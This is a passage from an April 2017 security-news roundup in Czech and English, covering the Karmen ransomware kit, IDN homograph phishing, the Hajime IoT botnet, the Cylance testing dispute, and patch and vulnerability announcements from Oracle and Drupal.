“This shows that the author was aware of the researchers’ report and seemed to have liked the name.” concluded the analysis.
Experts from Symantec also discovered bugs in the Hajime IoT malware and provided signatures for detecting them.
Mezi hackery se rozmáhá ransomware jako služba
20.4.2017 SecurityWorld Viry
Bezpečnostní experty znepokojuje nový trend. Ransomware jako služba se dá koupit za necelých 4 500 Kč.
Kyberzločinci mohou do svého arzenálu přidat další snadno použitelnou zbraň. Ransomware kit Karmen, který se na černém trhu objevil k dostání za 175 dolarů, tedy necelých 4 500 Kč. Na pochybných internetových fórech ho nabízí rusky hovořící hacker s nickem DevBitox, na kterého upozornila bezpečnostní společnost Recorded Future,
Karmen podle ní spadá do kategorie ransomware-as-a-service – ransomware jako služba, která v poslední době zaznamenává znepokojující rozmach. Takový ransomware totiž mohou zneužít i začínající hackeři s minimálními znalostmi, kteří za své peníze dostanou celý balík webových nástrojů určených k vývoji jejich vlastních ransomware útoků.
Práci s Karmen usnadňuje jednoduše ovladatelné rozhraní skrz které mohou uživatelé ransomware modifikovat, k dispozici mají také rychlý přehled zařízení, které se jim podařilo napadnout, a k tomu pohled do „banku“, kde vidí, kolik už jim jejich kriminální aktivity vynesly.
Rusky komunikující DevBitox, pravděpodobně jen jeden z vývojářů zodpovědných za Karmen, tento hackerský kit nabízí na několika pochybných fórech s tím, že dostupné jsou ruská a anglická jazyková verze. Dle zjištění Recorded Future od loňského prosince prodal dvacet kopií, které byly vysledovány v Německu a v USA. Pořizovací cena 175 dolarů se platí jednorázově předem.
„Takto nízká cena umožňuje vydat se hackerskou cestou více lidem a pořizovatelům umožňuje nechat si sto procent toho, co se jim podaří z obětí útoků získat,“ konstatuje šéf Recorded Future Andrej Baryšev.
Na druhou stranu, ti technicky zdatnější, mohou svá data zašifrovaná skrz Karmen relativně snadno zachránit. Škodlivý kód je totiž postavený na Hidden Tear, opensourceovém ransomware projektu, který kyberzločinci již delší dobu používají k vývoji vlastních ransomwarových mutací a proti kterému se bezpečnostním expertům daří docela zdárně bojovat vydáváním bezplatných nástrojů pro rozšifrování „unesených“ dat.
Phishingový útok výměnou IDN znaků v doméně znovu na scéně
20.4.2017 Root Phishing
O útoku jménem „Homograph Attack“ víme už šestnáct let, přesto stále ještě neexistuje dokonalá obrana. Nové experimenty ukazují, že stále můžeme naletět na domény se zaměněnými znaky.
Možnost registrovat si domény s národními znaky (IDN) se začala v jednotlivých TLD pozvolna objevovat v letech 2004 a 2005. Už nejméně od roku 2001 je ale známo, že záměnou znaků z různých abeced je možné vytvořit doménu na první pohled nerozeznatelnou od té původní. Pánové Evgeniy Gabrilovich a Alex Gontmakher to nazvali The Homograph Attack [PDF].
Bezpečnostní odborník Xudong Zheng o šestnáct let později ukazuje, že problém stále existuje a je zneužitelný k phishingovým útokům. IDN totiž umožňuje vytvořit doménové jméno, které nebude obsahovat jen ASCII znaky, ale prakticky libovolný Unicode znak. Znaky v některých abecedách (typicky cyrilice, ale i jiné) se totiž velmi podobají znakům v latince. Navíc se v mnoha fontech vykreslují zcela totožně s odpovídajícími latinkovými znaky, takže je nelze pohledem nijak rozlišit.
Porovnejte například tyto dvě domény. Poznáte, která z nich je phishingová a která patří doopravdy společnosti Apple?
Na první pohled jsou k nerozeznání a jedna z nich rozhodně uživatele oklame. Rozdíl je vlastně jen nepatrný – všimněte si, že se malé L ve slově Apple vykresluje různě. První doména je totiž nepravá a její jméno se skládá pouze ze znaků cyrilice. V zóně je ale zapsána jako https://www.xn--80ak6aa92e.com/.
Vyzkoušejte sami:
Apple.com vs. Apple.com
Epic.com vs. Epic.com
Firefox i Chrome zobrazí všechny odkazované domény správně, uživatel nemá jak poznat, že se dostal na falešnou stránku. V tomto případě weby zobrazují neškodnou informační stránku, ale technicky jim nic nebrání začít provádět phishing na uživatele originálních stránek.
Všimněte si také, že „phishingové“ weby používají HTTPS s důvěryhodným certifikátem. Získat DV certifikát pro takovou doménu není problém, autorita totiž ověřuje jen možnost manipulace s doménou, nedokáže certifikovat dobré úmysly vlastníka.
Čtěte: Budou mít všechny phishingové weby platný certifikát?
Certifikační autorita Let's Encrypt, která byla v demonstračních ukázkách použita, podporuje IDN domény od konce loňského roku a tvrdí, že bezpečnost si musí zajistit doménové registry. Pokud tedy je možné doménu zaregistrovat, vystaví vám na ni autorita certifikát. To může dále pomoci oklamat uživatele – doména je správná a je zabezpečená, všechno je v pořádku. Nutno dodat, že viníkem tu není Let's Encrypt, ale obecně princip chabě ověřovaných DV certifikátů.
Problém tohoto typu je možné řešit na obou stranách: registry mohou na IDN domény zavést speciální pravidla, prohlížeče mohou bránit uživatele vlastními prostředky. Některé registry zavedly možnost registrace domén jen s omezenou sadou Unicode znaků, jiné se brání míchání různých znakových sad. Bohužel to není všeobecné a pevné pravidlo, protože například generické domény umožňují z pochopitelných důvodů různé znakové sady, stejně jako existují jazyky, kde je míchání jednotlivých sad běžné.
Prohlížeče se brání velmi podobně: zobrazují lidsky čitelnou variantu domény jen v tom případě, že zobrazovaná doména nemíchá různé znakové sady. Pokud prohlížeč na takové použití narazí, chrání uživatele tím, že zobrazí punycode variantu, tedy název domény kódovaný do ASCII. Pokud by tedy například bylo v doméně apple.com nahrazeno cyrilicí jen první písmeno, prohlížeč by zobrazil xn--pple-43d.com.
V případě demo domén Apple a Epic ale k míchání sad nedochází, protože jejich jména vůbec neobsahují znaky v latince. Jsou celá napsaná cyrilicí a přesto jsou původním doménovým jménům velmi podobná. V zóně jsou ale uložena jako xn--80ak6aa92e.com a www.xn--e1awd7f.com. Obranné mechanismy v prohlížečích proto selhávají.
Ve Firefoxu je možné přepnout zobrazení natrvalo, takže se vám čitelná varianta nezobrazí v žádném případě. V about:config je potřeba najít volbu network.IDN_show_punycode a přepnout ji na true. U ostatních prohlížečů taková cesta neexistuje a uživatelé musí počkat na aktualizaci, která by měla problém vyřešit.
Vývojářům Chrome byla chyba nahlášena v lednu a oprava se dostane do příští verze Chrome s označením 58. Vývojáři Firefoxu mají také otevřený bug a zatím se baví o vhodném řešení. Opatření přijaté v Chrome bude hlídat, zda doménové jméno neobsahuje výhradně znaky podobné těm v latince. Kontrola ale bude probíhat jen na běžných latinkových TLD, ne na IDN TLD jako рф.
Aktualizace: Chrome 58 pro desktop byl vydán a skutečně obsahuje výše popsaný mechanismus, kterým se brání tomuto typu domén. Podvrženou doménu Apple.com nyní zobrazí uživateli v punycode.
Připomeňme, že naše národní doména .CZ podporu IDN nezavedla, protože se proti ni trvale staví většina uživatelů. Výsledky nejnovějšího průzkumu byly zveřejněny letos v únoru a proti zavedení systému IDN se vyslovilo 68 procent respondentů z řad individuálních uživatelů internetu a 71 procent oslovených zástupců organizací. Jedinou českou IDN doménou tak zůstává háčkyčárky.cz, kde CZ.NIC sdružuje výsledky průzkumů a vysvětluje nevýhody IDN domén.
Hackeři si vzali na mušku hotely. Napadli jich přes tisíc
20.4.2017 Novinky/Bezpečnost Kriminalita
Zhruba 1200 hotelů ve Spojených státech fungujících pod značkami řetězce InterContinental Hotels Group (IHG) se loni stalo terčem útoku hackerů, jejichž software mohl sbírat informace z platebních karet hostů. Informovala o tom firma.
Škodlivý software hackerů mohl sbírat informace z platebních karet hostů.
Hoteloví hosté byli varováni, že by se v důsledku tohoto útoku mohli stát obětí krádeže peněz. Program byl podle IHG aktivní pravděpodobně v období od 29. září do 29. prosince.
"Lidé by měli pozorně kontrolovat výpisy ze svých účtů platebních karet," řekla serveru BBC mluvčí společnosti. "Pokud objeví neautorizované platby, měli by okamžitě informovat svou banku," dodala.
Společnost IHG sídlí v Británii a vlastní například hotelové značky Holiday Inn a Crowne Plaza.
Cylance Battles Malware Testing Industry
20.4.2017 securityweek Analysis
Cylance vs. Malware Testing Industry
After a brief respite, the animosity between the incumbent anti-virus vendors and the newcomer machine learning (ML) endpoint protection vendors has returned; and the focus is still on testing.
On Monday this week, Ars Technica published an article with one new element: a test using 48 Cylance-provided malware samples showed 100% detection by Cylance, but somewhat less from competing products. It turned out that nine of the samples were harmless. This "led the engineer [conducting the tests]," wrote Ars, "to believe Cylance was using the test to close the sale by providing files that other products wouldn't detect -- that is, bogus malware only [Cylance] would catch."
On Tuesday, Cylance's vice president of product testing and industry relations, Chad Skipper, blogged about the Ars article and the 'harmless' samples. He explained that Cylance doesn't simply use known malware for tests, but alters them via the mpress and vmprotect packers so they effectively become unknown malware. Sometimes, however, the packing doesn't fully work, and actually renders the original malware harmless. This, he suggests, is closer to the real-life situation faced by end users.
Not all the questions raised by the Ars article are fully explained by Skipper. "Of the nine files in question," writes Ars, "testing by the customer, by Ars, and by other independent researchers showed that only two actually contained malware." Skipper responded, "We don't give empty files on purpose -- it's just not what we do."
Nevertheless, if seven of the 48 samples were incorrectly detected as malware by Cylance, that's a pretty high false positive rate of just over 14.5% -- a rate that would not have been detected had not the engineer looked more closely at the testing results.
This has led to some suggestions that Cylance is gaming the system. "It's unbelievable that businesses today can't trust the people who they rely on to keep them secure," commented Mike Viscuso, CTO and co-founder of endpoint security firm Carbon Black. "The actions Cylance has taken puts their customers and our national security at risk."
"Not sure if it can be called cheating," said Luis Corrons, technical director at PandaLabs, a competitor in the endpoint security space; "anyway it is clear to me that ethics are not an obstacle for Cylance to get new customers. They do not allow testers to do comparative testing of their solution unless they impose their methodology, therefore there is a lack of independent testing to validate their marketing claims, so they ask their prospects to do their own tests, and they give them a preselected set of 'malware'. He added that if he were to do similar at Panda, "I would be fired."
Cylance claims that the majority of independent third-party tests are biased in favor of the incumbent vendors that use malware signature databases (as well as other techniques, including their own use of machine learning). Those vendors in turn suggest that some (not all) ML-based vendors seek to bias the testing in their own favor, and threaten law suits if they do not get their own way. The threat became reality earlier this year when CrowdStrike sued testing firm NSS Labs.
One of Skipper's arguments is that other vendors use the Anti Malware Testing Standards Organization's (AMTSO) Real Time Threat List (RTTL). This list is largely known by the vendors, and consequently does not provide a genuine test.
While this may be true for some vendors' own tests, it is not generally true for third-party testing. Lists such as RTTL and the WildList are mostly used for product certification, but not for comparative testing. Independent researcher David Harley explained, "They're of considerably less use for comparative testing, as the testing industry has always been aware. After all, the point of comparative testing is to differentiate between products. A test restricted to malware which is already known to vendors (or a substantial majority thereof) is not going to show enormous differences."
This was confirmed by an independent third-party tester who asked not to be named. He described four methods of acquiring malware samples: from a vendor; from VirusTotal; from a third-party source such as a large corporation; and lastly, by monitoring the threat landscape and acquiring threats and attack methods independently. He, and he believes the majority of test labs, use the last method.
"Tests that use malware gathered using the first three approaches could put Cylance at a disadvantage versus vendors that suck in lots of files and generate signatures," he told SecurityWeek. "But I'm not sure that it's fair to say that all vendors do that. It seems a bit old-fashioned and error-prone. I also don't think it makes the tests unfair. It simply highlights the inconvenient fact that there are loads of threats and Cylance's approach is not perfect because it doesn't provide full coverage. Sure, it is at a disadvantage -- but one of its own making, not because the testing is wrong."
Harley agrees with this basic viewpoint. "If comparative testing was about the exclusive use of cooperatively verified lists, it would still be more accurate than using samples supplied by a single vendor and containing a high percentage of garbage files."
John Shaw, VP product management at Sophos, also a player in the next-gen endpoint security market, pointed out that the Cylance arguments against the third-party testing industry could more accurately be aimed at Cylance itself. "The leading testing organizations," he told SecurityWeek, "are working to improve their ability to test products in more representative 'real world' environment, using massively used techniques like infecting legitimate websites, and exploits against legitimate software. To do this at scale is hard and the industry still has a long way to go. Clearly for an individual customer to try and run a statistically significant test that simulates the real world is close to impossible, even with unlimited time." (Sophos previously published a stinging rebuke against Cylance's product comparison methods last summer.)
This doesn't mean it's impossible to self-test -- just very, very hard. "With testing," said Viscuso, "it's important to go beyond malware samples and test how the product handles real-world attacks. Malware samples alone are going to demonstrate one thing -- how well the product can stop the particular malware samples in your sample set. You're interested in stopping attacks, not just malware. Real world attackers don't rely on packed executables. They use documents, PowerShell, Python, Java, built-in OS tools, anything they can leverage to get the job done. To test the solution against real-world attack techniques, use a penetration testing framework such as Metasploit. Construct payloads with Veil-Evasion and use the techniques seen in real attacks. PowerShell Empire is also a great way to build PowerShell command lines and macro-enabled documents that go beyond executable malware samples."
It should be said that several vendors, including ML-based vendors and test laboratories, declined to comment: the issue is bitter and divisive. From those that did respond to SecurityWeek, the consensus is clear. Almost all agree that comparative third-party testing is difficult, but not impossible. And almost all, but one, agree that in rejecting independent testing, Cylance has replaced it with something far worse and potentially misleading. The exception is NSS Labs. "I don’t think Cylance did anything wrong," said Vikram Phatak, CEO of NSS Labs. "Their execution appears to have been problematic, but not their approach."
Personalized Spam and Phishing
20.4.2017 Kaspersky Spam
Most spam, especially the sort that is mass-mailed on behalf of businesses, has quite an impersonal format: spammers create a message template for a specific mailing purpose and often drastically diversify the contents of that template. Generally, these kinds of messages do not personally address the recipient and are limited to common phrases such as “Dear Client”. The most that personal data is ever involved is when the name of the mailbox (or part of it) is substituted with the electronic address that the spammer has. Any specifics that may help the recipient ascertain whether the message is addressed personally to him or not, for example, an existing account number, a contract number, or the date of its conclusion, is missing in the message. This impersonality, as a rule, attests toa phishing attempt.
Lately, however, we have been noticing an opposite tendency occurring quite often, wherein fraud becomes personalized and spammers invent new methods to persuade the recipient that the message is addressed personally to him. Thus, in the malicious mailing that we discovered last month, spammers used the actual postal addresses of the recipients in messages to make them seem as credible as possible. This information is sold to evildoers as ready-to-use databases with physical addresses (they are frequently offered for sale in spam messages), collected by evildoers from open sources, or obtained by evildoers when hacking email accounts, for example. Of course, cybercriminals will not have very many of these addresses at their disposal (compared to generated addresses), but they are much more valuable.
The way spammers organize their personalized attacks plays an important role as well. In general, messages are mass mailed on behalf of an existing company, while the technical headers of fake messages use the company’s actual details.
There are several ways to use valid details. The most unsophisticated method is spoofing, which is substitution of technical headers in messages. The headers can be easily placed with any mass mailing program. In particular, during the spoofing process, the “From” field contains the real address of the sender that the fraudsters have. In this case, spam will be mass-mailed on behalf of the spoofed company, which can stain the company’s reputation quite seriously. Yet, not all technical headers can be substituted when spoofing, and good anti-spam filters will not let these messages through.
Another method entails sending spam from so-called hijacked infrastructure, which is much harder to do technically, as the mail server of the target company has to be hacked. After gaining control over it, an evildoer can start sending messages with legitimate technical headers from any email address owned by the company and on behalf of any employee who works there. At the same time, the fake message looks quite credible for anti-spam filters and freely travels from server to server, as all of the necessary certificates and digital signatures in the header correspond to genuine counterparts. This would result in losses by both the recipient, who takes the bait of the evildoers (network infection and theft of personal data or business information), and the company, whose infrastructure is abused by the evildoers.
Usually, cybercriminals select small businesses (with up to several dozen employees) as victims for hacking. Owners of so-called parked domains are of particular interest, as parked domains are used by a company without creating a website on these domains.
In the samples detected by us, personalized malicious spam was mass-mailed on behalf of an existing business that was a small company specialized in staff recruitment. The messages contained order delivery notifications that are typical of malicious spam, but also indicated the real postal addresses of the recipients. The messages also contained URLs that were located on legitimate domains and were constantly changing throughout the mailings. If a user navigates to the URL, then malicious software will be downloaded to the user’s computer.
In this way, we may affirm that spam is becoming more personalized and mailing is becoming targeted. With the rising digital literacy of users, this is exactly what evildoers rely upon; It is not so easy to remember all your subscriptions, all your online orders, or where you’ve left your personal data, including addresses. Such an information load calls for the use of smart security solutions and the employment of security measures to protect your “information-driven personality”.
To Protect Your Devices, A Hacker Wants to Hack You Before Someone Else Does
19.4.2017 thehackernews Hacking
It should be noted that hacking a system for unauthorised access that does not belong to you is an illegal practice, no matter what's the actual intention behind it.
Now I am pointing out this because reportedly someone, who has been labeled as a 'vigilante hacker' by media, is hacking into vulnerable 'Internet of Things' devices in order to supposedly secure them.
This is not the first time when any hacker has shown vigilance, as we have seen lots of previous incidents in which hackers have used malware to compromise thousands of devices, but instead of hacking them, they forced owners to make them secure.
Dubbed Hajime, the latest IoT botnet malware, used by the hacker, has already infected at least 10,000 home routers, Internet-connected cameras, and other smart devices.
But reportedly, it's an attempt to wrestle their control from Mirai and other malicious threats.
Mirai is an IoT botnet that threatened the Internet last year with record-setting distributed denial-of-service attacks against the popular DNS provider Dyn last October. The botnet designed to scan for IoT devices that are still using default passwords.
How the Hajime IoT Botnet Works
Hajime botnet works much like Mirai — it spreads via unsecured IoT devices that have open Telnet ports and uses default passwords — and also uses the same list of username and password combinations that Mirai botnet is programmed to use, with the addition of two more.
However, what's interesting about Hajime botnet is that, unlike Mirai, it secures the target devices by blocking access to four ports (23, 7547, 5555, and 5358) known to be vectors used to attack many IoT devices, making Mirai or other threats out of their bay.
Unlike Mirai, Hajime uses a decentralized peer-to-peer network (instead of command and control server) to issue commands and updates to infected devices, which makes it more difficult for ISPs and Internet backbone providers to take down the botnet.
Hajime botnet also takes steps to hide its running processes and files on the file system, making the detection of infected systems more difficult.
Besides this, Hajime botnet also lacks DDoS capabilities or any other hacking code except for the propagation code that lets one infected device search for other vulnerable devices and infects them.
One of the most interesting things about Hajime: the botnet displays a cryptographically signed message every 10 minutes or so on terminals. The message reads:
Just a white hat, securing some systems.
Important messages will be signed like this!
Hajime Author.
Contact CLOSED Stay sharp!
There's Nothing to Get Excited
No doubt, there's a temptation to applaud Hajime, but until users don't reboot their hacked devices.
Since Hajime has no persistence mechanism, which gets loaded into the devices' RAM, once the IoT device is rebooted, it goes back to its unsecured state, complete with default passwords and the Telnet port open to the world.
"One day a device may belong to the Mirai botnet, after the next reboot it could belong to Hajime, then the next any of the many other IoT malware/worms that are out there scanning for devices with hard coded passwords. This cycle will continue with each reboot until the device is updated with a newer, more secure firmware," the Symantec researchers explained.
There's another problem...
Hacking someone to prevent hacking is not a thing, that’s why we are also concerned about a related amendment passed by the United States — Rule 41 — which grants the FBI much greater powers to legally break into computers belonging to any country, take data, and engage in remote surveillance.
So, the most concerning issue of all — Is there any guarantee that the author of Hajime will not add attack capabilities to the worm to use the hijacked devices for malicious purposes?
Tracking Pixels Used in Phishing Campaigns
19.4.2017 securityweek Phishing
Tracking Pixels Used in Phishing Campigns
Very small image files that can track user behavior have started to emerge in phishing campaigns, where hackers use them to gather information on their targets, Check Point researchers warn.
These very small image files are designed to send a string of code to an outside website. Usually of only one pixel in size, these images can also be hidden by setting them to the same color as the background of a web page, which allows them to go unnoticed by the user. They can also be used in emails, with the same purpose, and are called tracking pixels because of their small size and obvious purpose.
The code in these pixels is meant to ping the website when the image is downloaded, and can be designed to “capture information such as IP addresses, hostnames, operating systems, Web-browser types, dates the image was viewed, use of cookies, and other information,” Check Point explains.
This information is most often used by marketers to fine tune their advertising, but cybercriminals can also abuse the technique to gather information on cloud-platform components and discover known software vulnerabilities they can exploit in a later attack.
Check Point also explains that phishers can use tracking pixels in their attacks to learn which recipients are most likely to open their scam emails. Phishing attacks that leverage tracking pixels as a surveillance tool have been already observed in the wild, Check Point says.
“Since some scammers retool mass phishing attacks against random users to target high-value enterprise users, scammers are turning to pixel tracking to increase the odds a spear phishing attack will succeed,” the researchers reveal.
The researchers observed tracking pixels in phishing emails in August 2016, when in-place filters prevented the image from loading, which resulted in a red x placeholder image being displayed instead. These small images, Check Point says, threaten privacy in more than emails and web pages.
“For well over a decade, it has been understood that you can utilize tracking pixels in Microsoft Office files like Word documents, Excel spreadsheets and PowerPoint presentations. This works because Office files can link to an image located on a remote Web server. Putting a tracking pixel in an Office document allows you to be able to track a document’s activity as it moves through an organization,” the security firm notes.
While not found to be the direct cause of any specific security breach, tracking pixels are used for their surveillance capabilities in activities that precede attacks against users and infrastructure. The good news, however, is that it’s easy to stay protected.
Enterprises are advised to deploy email and anti-phishing security controls as part of their cloud-security arsenal, as well as to ensure that any software running in a cloud environment is patched at all times. Using web application security to protect any unpatched software should also help prevent intrusion. Looking for anomalous image placeholders when downloading pictures in advertising emails is also a good idea.
Critical vulnerability in Drupal References Module opens 120,000 Sites to hack
19.4.2017 securityaffairs Vulnerebility
A critical vulnerability affects the Drupal References module that is used by hundreds of thousands of websites using the popular CMS.
The Drupal security team has discovered a critical vulnerability in a third-party module named References.
The Drupal team published a Security advisory on April 12 informing its users of the critical flaw.
The flaw has a huge impact on the Drupal community because the affected module is currently used by more than 121,000 websites.
“The module is currently used by over 120 000 individual Drupal installations, but is no longer maintained. The last update was done in February 2013. Unfortunately, a critical security vulnerability in this references module has been reported by the Drupal core security team as SA-CONTRIB-2017-38:
Please note, the security team will not release information on this vulnerability for up to a month, the recommendation is to migrate. Emails asking for details on the vulnerability will not be responded to. If you would like to maintain the module, please follow the directions below.
” states Drupal.
The References module allows users to add references between nodes for more complex information architectures.
The module was initially flagged by the Drupal development team as unsupported, its last update was provided in February 2013.
The good news for References users is that, on April 14, the Drupal security team announced it was assigned to a new maintainer.
“2017-04-14 – A potential new maintainer is working through the process of fixing the References module. When this is complete a new release will be published and this SA will be updated.” reads the advisory.
A few days later, on April 18 the problem has been fixed with the release of references 7.x-2.2.
References module
The Drupal security team did not disclose the technical details about the vulnerability in order to avoid the exploitation of the flaw in the wild. Unfortunately, it will very difficult to upgrade websites heavily using the Reference module.
“With a critical issue in an unsupported module so widely used, it is almost guaranteed that a large number of sites will be subject to attacks using this as a vector.” states Drupal. “Given the tradition of Drupal doing big backward breaks with regards to compatibility, some sites might be difficult to upgrade. Upgrading an enterprise site heavily using References may simply be impossible and hopefully drive the module to be maintained by a corporate entity.”
Drupal will release information on the critical vulnerability in the next few weeks.
Security experts believe threat actors could find the vulnerability by analyzing the source code of the module and could develop and exploit.
Drupal CMS is a privileged target for hackers that try to exploit vulnerabilities in the out-dated plugin.
In June 2016, security experts warned of the Drupalgeddon attacks against Drupal websites, more than 19 months after the public disclosure of the CVE-2014-3704.
Oracle Patches Record Number of Vulnerabilities
19.4.2017 securityweek Vulnerebility
Oracle’s Critical Patch Update (CPU) for April 2017 contains 299 fixes, the highest number compared to previous CPUs.
More than half of the vulnerabilities could be remotely exploitable without authentication. 40 of the issues were rated Critical, and 25 had a CVSS score of 10.
Oracle Financial Services Applications was the most affected product, receiving fixes for 47 vulnerabilities this month, with 19 of them rated critical with a CVSS score of 10. Aditionally, 25 of the 47 vulnerabilities may be remotely exploitable without authentication, Oracle’s advisory reveals.
Oracle CPU April 2017Released this week, Oracle latest CPU addressed vulnerabilities in 25 applications: MySQL and Retail Applications (39 fixes each), Fusion Middleware (31), Sun Systems Products Suite (21), PeopleSoft (16), Virtualization (15), Berkeley DB (14), Support Tools (13), E-Business Suite (11), Communications Applications (11), Java SE (8), Utilities Applications (7), Primavera Products Suite (7), Hospitality Applications (6), Commerce (3), Database Server (2), Enterprise Manager Grid Control (2), and Secure Backup, Hyperion, Supply Chain Products Suite, JD Edwards Products, Siebel CRM, Health Sciences Applications, and Insurance Applications (1 each).
The most important of the addressed issues are related to the Remote Code Execution flaw in Apache Struts 2 that was found last month to be exploited in the wild after someone published a proof-of-concept (PoC) exploit. Cisco and VMWare products were impacted as well.
“Cybercrime has always been a lucrative business. Nowadays, hackers set their eyes on enterprises more than on individuals, as they understood that it is more profitable. Taking into account that Oracle’s products are installed in the largest enterprises, these applications can be the ultimate target. The good news is that the vendor drew its attention to this critical area before a serious data breach happens. The bad news is that Oracle admins will long work on installing numerous patches,” Alexander Polyakov, CTO at ERPScan, says.
Oracle addressed critical bugs in the Solaris component of Oracle Sun Systems Products Suite, MySQL Enterprise Monitor component of Oracle MySQL (Struts 2), Oracle FLEXCUBE Private Banking component of Oracle Financial Services Applications (Struts 2), Oracle Financial Services Asset Liability Management component of Oracle Financial Services Applications (Struts 2), and Oracle Financial Services Data Integration Hub component of Oracle Financial Services Applications (Struts 2).
Over the past several quarters, Oracle has been patching an increasingly higher number of vulnerabilities with each new CPU. With 276 patches, the July 2016 CPU was the first to include over 250 fixes, but the trend continued each quarter since, with 253 flaws addressed in October 2016, and 270 in January 2017.
The trend is expected to continue in the following quarters as well. However, as it usually happens with all software, this doesn’t mean the applications are becoming more vulnerable, but that the researcher community is getting better at finding security issues.
Many Cybercriminals Prefer Skype for Communications: Study
19.4.2017 securityweek CyberCrime
Cybercriminals are increasingly interested in ensuring that their communications are encrypted, and the favorite tool of many appears to be Microsoft’s Skype, according to a new report from threat intelligence firm Flashpoint.
Data collected by Flashpoint from deep and dark web cybercrime communities between 2012 and 2016 shows that ICQ, Skype, Jabber, PGP, AOL Instant Messenger, Telegram, WeChat, QQ, WhatsApp, and Kik have been the most widely used tools.
The company’s study is based on the number of mentions on Russian, Spanish, French, Arabic, Chinese, Persian (Farsi) and English language forums typically used by profit-driven cybercriminals. The study does not include Signal and Line due to the fact that these are common words in English and programming languages, but experts believe their usage by threat actors is insignificant.
An analysis of Russian underground websites showed that ICQ was the most popular back in 2012 and accounted for more than half of mentions. Skype and Jabber also accounted for 26% and 19% of mentions, respectively. By 2016, Skype became the most mentioned messaging tool, with Jabber and ICQ dropping to the second and third positions.
On Spanish-speaking forums, Skype was in the lead in 2012, but last year it dropped to second place. The most mentioned messaging platform in 2016 was ICQ, with more than half of mentions.
Researchers believe ICQ has become more popular among Spanish-speaking cybercrooks due to the influence of more sophisticated hackers from Russian communities. In fact, Russian actors are considered the most innovative and sophisticated, and they are often trendsetters.
As for French-speaking communities, PGP was the most referenced in 2012, with nearly 60% of the total mentions. While not actually a messaging service, Forcepoint decided to include it in its study due to its popularity.
PGP continued to be popular on the French underground, but Jabber took the lead in 2016. Experts believe cybercriminals had started using it alongside PGP.
Skype was the most popular on Arabic-language forums back in 2012. WhatsApp was the most referenced last year, but Skype still managed to remain one of the favorites.
The situation has been different in China, where cybercriminals prefer applications developed by local tech company Tencent. Its QQ and WeChat apps accounted for more than 90% of mentions, both in 2012 and last year.
Persian-language communities also don’t appear to be influenced by others as much. In 2012, Yahoo Messenger was the most popular, and the favorite in 2016 was Telegram, with nearly 90% of all mentions. It’s worth noting that Flashpoint’s analysis of the Iranian underground is more general and it does not focus on financially motivated cybercrime.
On English-language underground websites, Skype was and remains the most mentioned application. In fact, Skype appears to be the most popular overall, being included in the top five messengers in all language groups.
According to Flashpoint, its study also shows that cybercriminals are increasingly interested in encrypted communications, a trend that is likely due to recent revelations of NSA surveillance, the proliferation of secure chat apps, and the influence of more sophisticated actors.
“The results of this study underscore the interconnected, agile nature of the cybercriminal ecosystem. Regardless of their language, skills, location, or a liation, cybercriminal groups tend to share a strong desire to reap the benefits of cross-community collaboration, information sharing, and even mentorship,” Flashpoint said in its report.
“Such activities necessitate consistent access to reliable means of communication, which is why the digital communication tools examined within this study play such an integral role in facilitating cybercriminal behavior. In many instances, a cybercriminal’s livelihood may depend on his or her ability to communicate with peers while evading third-party detection. As such, the decision to utilize one communication tool over others is not taken lightly and often influenced by numerous contextual social, cultural, and geopolitical factors,” the company added.
Kaspersky Adds Password Manager to Bug Bounty Program
19.4.2017 securityweek Vulnerebility
Kaspersky Lab has informed researchers that its bug bounty program has been extended. The company has also decided to add a new product to its program and increase the maximum reward.
Kaspersky launched its HackerOne-powered bug bounty program in August 2016. The first phase, which lasted for six months and promised a total of $50,000 in bounties, led to the discovery of more than 20 flaws.
Given the program’s success so far, the security firm has decided to extend it and make some changes. Bug bounty hunters can now earn rewards for finding vulnerabilities in Kaspersky Password Manager 8. Until now, only Kaspersky Internet Security 2017 and Kaspersky Endpoint Security 10 were in scope.
The security firm also announced that the maxim reward for remote code execution vulnerabilities has been increased from $2,000 to $5,000. White hat hackers can earn, on average, $1,000 for local privilege escalation flaws and $2,000 for sensitive information disclosure issues. The minimum reward is $300.
“Since August, it is fair to say that our Bug Bounty Program has been successful in optimising our internal and external mitigation measures to continuously improve the resiliency of our products. That’s why we’ve decided to extend it,” said Nikita Shvetsov, Chief Technology Officer at Kaspersky Lab.
“We appreciate the enthusiastic participation of security researchers worldwide. As a mark of our respect for the work they do in helping us to bolster our solutions, we’ve increased the remuneration on offer in this second phase of the program and extended the scope to include other important Kaspersky Lab products,” Shvetsov added.
Google Project Zero researcher Tavis Ormandy has reported finding several vulnerabilities in Kaspersky products in the past years. The most recent, disclosed in January, was related to how the security firm’s products inspect SSL/TLS connections.
Chrome, Firefox Users Exposed to Unicode Domain Phishing
19.4.2017 securityweek Phishing
Malicious actors can create legitimate-looking phishing domains by leveraging the fact that some popular web browsers fail to properly protect their users against homograph attacks.
Web developer Xudong Zheng has demonstrated how an attacker could have registered the domain name “xn--80ak6aa92e.com,” which is displayed by web browsers such as Chrome, Opera and Firefox as “apple.com.”
Unicode is a standard for encoding and representing all characters and glyphs from all languages. Unicode characters can be used in Internet hostnames through Punycode. For instance, the Chinese word “短” is equivalent to “xn--s7y.”
Characters such as the Cyrillic “а” and the Latin “a” may look the same, but they are represented differently in Punycode, allowing malicious actors to create domains where Latin letters are replaced with similar-looking Greek or Cyrillic characters. This is known as an internationalized domain name (IDN) homograph attack.
Modern web browsers are designed to prevent these types of attacks – for example, "xn--pple-43d.com" will be displayed as "xn--pple-43d.com" instead of “apple.com.” However, Zheng discovered that this filter can be bypassed in Chrome, Firefox and Opera by creating the entire domain name using Cyrillic characters, leading to "xn--80ak6aa92e.com” being displayed as “apple.com.”
For a proof-of-concept (PoC), the expert registered the domain “xn--80ak6aa92e.com” and obtained a free digital certificate for it from Let’s Encrypt. When the domain is accessed via Opera, Chrome or Firefox, the user sees the domain name “apple.com” with a certificate issued for “apple.com.”
Wordfence has demonstrated the attack technique by spoofing the healthcare website “epic.com,” and experts at SANS have also provided some examples.
Zheng reported his findings to Google and Mozilla on January 20, and while the upcoming Chrome 58 will resolve the issue, Mozilla is still trying to figure out how to address the problem.
Mozilla initially classified the vulnerability report as “WONTFIX,” but later reopened it and assigned it a low severity rating. Until the organization comes up with a fix, Firefox users can protect themselves against potential attacks by typing “about:config” in the address bar to access advanced settings, and changing the “network.IDN_show_punycode” preference to “true.”
Edge, Internet Explorer and Safari are not affected. However, it’s worth noting that researchers did report recently that cybercriminals had been targeting Office 365 business email users by exploiting a weakness in how Office 365 handles Punycode.
Karmen Ransomware Deletes Decryptor If Sandbox is Detected
19.4.2017 securityweek Ransomware
Karmen Ransomware Deletes Decryptor Component When Detecting a Sandbox Environment or Analysis Software
